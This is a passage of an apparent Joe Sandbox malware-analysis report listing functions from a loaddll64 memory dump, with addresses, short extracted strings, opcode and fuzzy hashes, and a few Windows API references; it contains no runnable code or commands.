Similarity

API ID:
String ID: ($U$wU
API String ID: 0-2031152664
Opcode ID: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction ID: 63807de6178b1657ad1a902dfd73c136082737fd32258a2b89e90bae0d465738
Opcode Fuzzy Hash: d030330acb421e585ce2b574953e0510a66a350c77e1366bf0b1b6b086404ac8
Instruction Fuzzy Hash: 4E42C5719097C88BDBF9DE24C8893DD7BF0FF48344F50515A984E9A694CBB86688CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016464 Relevance: 4.1, Strings: 3, Instructions: 330COMMON

Download Yara Rule

Strings

U, xrefs: 0000000180016ACA
y, xrefs: 0000000180016AAA
!d.#, xrefs: 00000001800165F6

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: y$!d.#$U
API String ID: 0-1702114524
Opcode ID: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction ID: 4b2da67fef5f64081cc442b482ab5a3168f7e247fbdeb14fd0ac8dc0810a9ec3
Opcode Fuzzy Hash: 061c74f3ba4e2152ff7bfc3bb03a690cfa0dcda01d33ce28c375482b364cb02f
Instruction Fuzzy Hash: 7702B371504AC88BDBBDDF24CC897EF7BA1FB44346F10561AD88A9A290DBB45785CF01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015B18 Relevance: 4.0, Strings: 3, Instructions: 261COMMON

Download Yara Rule

Strings

h^, xrefs: 0000000180015B32
h, xrefs: 0000000180015F52
=1Z, xrefs: 0000000180015B8A

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: =1Z$h^$h
API String ID: 0-2636329743
Opcode ID: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
Instruction ID: b01e88b6b57ba4d7dccfa73d8ad07d3cee0fb8b291d2e61316bf3d6cb9ca5404
Opcode Fuzzy Hash: 36181cb170d6f76158f3dc770eb623a7b3ca10ea6b51aaa1b83d78e1cc7645e9
Instruction Fuzzy Hash: 42E1D9705087C8CBEBBECF64C8897DA7BA8FB44708F10561DE94A9E258DB745749CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180027EA4 Relevance: 4.0, Strings: 3, Instructions: 253COMMON

Download Yara Rule

Strings

bVZ, xrefs: 0000000180028141
V, xrefs: 0000000180027F18
o(, xrefs: 0000000180027F9A

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: V$bVZ$o(
API String ID: 0-1660054416
Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013FE0 Relevance: 4.0, Strings: 3, Instructions: 227COMMON

Download Yara Rule

Strings

#X, xrefs: 0000000180014170
m%K, xrefs: 00000001800141F5
$&], xrefs: 0000000180014371

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: #X$$&]$m%K
API String ID: 0-1065608980
Opcode ID: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
Instruction ID: 281ae2356dc6a3955f278cfb62bb8b0cbfc4af089bf5b994b6edc0547db548b7
Opcode Fuzzy Hash: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
Instruction Fuzzy Hash: 48C179B1A0460DCFDB68DF78D15A5DD7BF1BB48308F206129F8269A2A2E374A509CF54

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000569C Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

K#, xrefs: 00000001800058C8
LI, xrefs: 000000018000575A
cn , xrefs: 000000018000573A

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: K#$LI$cn
API String ID: 0-3773415493
Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025D84 Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

^F, xrefs: 0000000180025DC4
$e, xrefs: 0000000180025EB9
Is, xrefs: 0000000180025DCC

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $e$Is$^F
API String ID: 0-4110932142
Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021728 Relevance: 3.9, Strings: 3, Instructions: 156COMMON

Download Yara Rule

Strings

0ZI, xrefs: 00000001800218B6
dUn, xrefs: 000000018002184B
4, xrefs: 00000001800219C7

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 0ZI$4$dUn
API String ID: 0-3362017604
Opcode ID: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
Instruction ID: 064bfcd7f6638f6f98711acfe7d0f42a6c132ae3c1731c2332aecbaa5a5ea63a
Opcode Fuzzy Hash: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
Instruction Fuzzy Hash: 0B712B7050C7888FD7B9DF28C5856DEBBF5FB85744F10491DE68A8B2A0CB769A44CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B520 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

O, xrefs: 000000018001B6B8
j , xrefs: 000000018001B572
[_K&, xrefs: 000000018001B6AA

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: O$[_K&$j
API String ID: 0-2002151384
Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006650 Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

-h, xrefs: 0000000180006672
WT, xrefs: 0000000180006817
>"I, xrefs: 000000018000683A

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: -h$WT$>"I
API String ID: 0-2979910649
Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180029124 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

I$s, xrefs: 000000018002916E
-, xrefs: 0000000180029367
34, xrefs: 0000000180029346

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 34$I$s$-
API String ID: 0-2987712878
Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008FA0 Relevance: 3.8, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

3W, xrefs: 00000001800090E2
v , xrefs: 000000018000903E
sR, xrefs: 0000000180009081

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3W$sR$v
API String ID: 0-1518777123
Opcode ID: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
Instruction ID: c80d461967320ed9e8a283cc826d951d9acd29724fcff4159453b991850cd8cf
Opcode Fuzzy Hash: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
Instruction Fuzzy Hash: 7341B7B190034A8FDB48CF64C48A5DE7FB1FB58398F504619FC55A6290D3B896A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C1DC Relevance: 3.8, Strings: 3, Instructions: 88COMMON

Download Yara Rule

Strings

>, xrefs: 000000018001C204
Da, xrefs: 000000018001C1FD
p, xrefs: 000000018001C1F6

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >$Da$p
API String ID: 0-3088490888
Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015334 Relevance: 3.8, Strings: 3, Instructions: 87COMMON

Download Yara Rule

Strings

[?, xrefs: 00000001800153BD
z, xrefs: 0000000180015340
Y, xrefs: 00000001800282F9

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Y$[?$z
API String ID: 0-81702474
Opcode ID: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
Instruction ID: 17df8d7d90ce60fd82a33c040225e484019840e26e547c8a3bada95d9f576c07
Opcode Fuzzy Hash: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
Instruction Fuzzy Hash: CF41E2705187859BD398DF68C48991FBBF0FBC5388F906A1DF982866A0C7B4D958CB43

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800159A0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

%i, xrefs: 0000000180015AC7
J_d, xrefs: 00000001800159D3
o, xrefs: 0000000180015A11

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %i$J_d$o
API String ID: 0-2302849290
Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1E0 Relevance: 3.8, Strings: 3, Instructions: 84COMMON

Download Yara Rule

Strings

%.&, xrefs: 000000018000D945
~!, xrefs: 000000018000D9DC
z, xrefs: 000000018000D9A8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %.&$~!$z
API String ID: 0-3431779881
Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004B4C Relevance: 3.8, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

B3, xrefs: 0000000180004B5F
J:, xrefs: 0000000180004C3F
., xrefs: 0000000180004C0F

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: .$B3$J:
API String ID: 0-3064689667
Opcode ID: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
Instruction ID: 182ec4a01b3342a6bdc382118e07b0b009bb3174144ecf8c9284c759066334ab
Opcode Fuzzy Hash: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
Instruction Fuzzy Hash: 1E41F3B090078E8FDB48CF24C88A0DE7BB0FB58358F114A1DEC56A6290D3B89664CF85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B8D0 Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

p7, xrefs: 000000018000B8E3
Ks, xrefs: 000000018000B90F
ie, xrefs: 000000018000B9A8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Ks$ie$p7
API String ID: 0-1618259084
Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B898 Relevance: 3.8, Strings: 3, Instructions: 64COMMON

Download Yara Rule

Strings

}j, xrefs: 000000018001B917
N=?S, xrefs: 000000018001B907
v, xrefs: 000000018001B8B4

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: N=?S$v$}j
API String ID: 0-4092938293
Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800198DC Relevance: 3.8, Strings: 3, Instructions: 55COMMON

Download Yara Rule

Strings

WFY, xrefs: 0000000180019901
2`, xrefs: 00000001800198E0
XS, xrefs: 00000001800199A3

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 2`$XS$WFY
API String ID: 0-4220438673
Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE71910 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFA0AE71B5F
RaiseException.KERNEL32 ref: 00007FFA0AE71B70

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction ID: 51bc9b567915f7e90e336c32a09db521a1f38ed955d2a10f6c48bbc593889d45
Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
Instruction Fuzzy Hash: 60B14873600B948BEB15CF29D88226C77A0F785B88F14CA62DA5D877B4DB39D852C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE79410 Relevance: 3.1, APIs: 2, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32 ref: 00007FFA0AE79465

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 242a5c4160673c2439d74d93392631954be848024110d8d99870b79e56e5634b
Instruction ID: 6764e7333cf5ec1ffbf7f469701e776c029d041b0ee92e94c3caba99788f1703
Opcode Fuzzy Hash: 242a5c4160673c2439d74d93392631954be848024110d8d99870b79e56e5634b
Instruction Fuzzy Hash: D0213B33608B9586DBA0DF25F4C072EB3A1FB86794F008565EA8D83B69EF7DD4448B40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010954 Relevance: 2.9, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

d9(4, xrefs: 00000001800109F6
Y6}, xrefs: 0000000180010ADE

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Y6}$d9(4
API String ID: 0-3330832364
Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001308C Relevance: 2.8, Strings: 2, Instructions: 302COMMON

Download Yara Rule

Strings

LPX, xrefs: 0000000180013275
?T~, xrefs: 00000001800132DA

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: ?T~$LPX
API String ID: 0-3819494200
Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800257B4 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

K>DO, xrefs: 0000000180025A9D
5]w, xrefs: 0000000180025AE4

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 5]w$K>DO
API String ID: 0-1721466923
Opcode ID: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
Instruction ID: 7ff9c6c976455071c2a9df6d60b89cf37126c55da19abf4d4cee6ceb2b958208
Opcode Fuzzy Hash: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
Instruction Fuzzy Hash: 0BB1227550234CCBEBA9DF68D1CA6DD7BE1EF24344F104019FC5A9A2A2C774D929CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180023D28 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

lqCn, xrefs: 0000000180023E96
m[l, xrefs: 0000000180023E02

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: lqCn$m[l
API String ID: 0-3128696216
Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800110AC Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

U, xrefs: 00000001800113BA
Nt, xrefs: 0000000180011290

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Nt$U
API String ID: 0-2773090818
Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000FF64 Relevance: 2.7, Strings: 2, Instructions: 192COMMON

Download Yara Rule

Strings

Us, xrefs: 00000001800102A7
#X, xrefs: 00000001800101A3

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: #X$Us
API String ID: 0-3203413852
Opcode ID: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
Instruction ID: 41232c5cd5cce4775d7c49e7c64c552743a4e7719aa725caeeb3acb0d5dfb118
Opcode Fuzzy Hash: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
Instruction Fuzzy Hash: 54B167B590070DCFEB98DF28C18A59D3BA9FF55308F404129FC1E962A1E3B8E518CB56

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001FB88 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

tt", xrefs: 000000018001FCF1
%R, xrefs: 000000018001FBFE

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %R$tt"
API String ID: 0-772664118
Opcode ID: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
Instruction ID: 8fbc46d1b7e2f611e930d46153dfa18b699fa5ceb3b757a8db7b1acf46b52deb
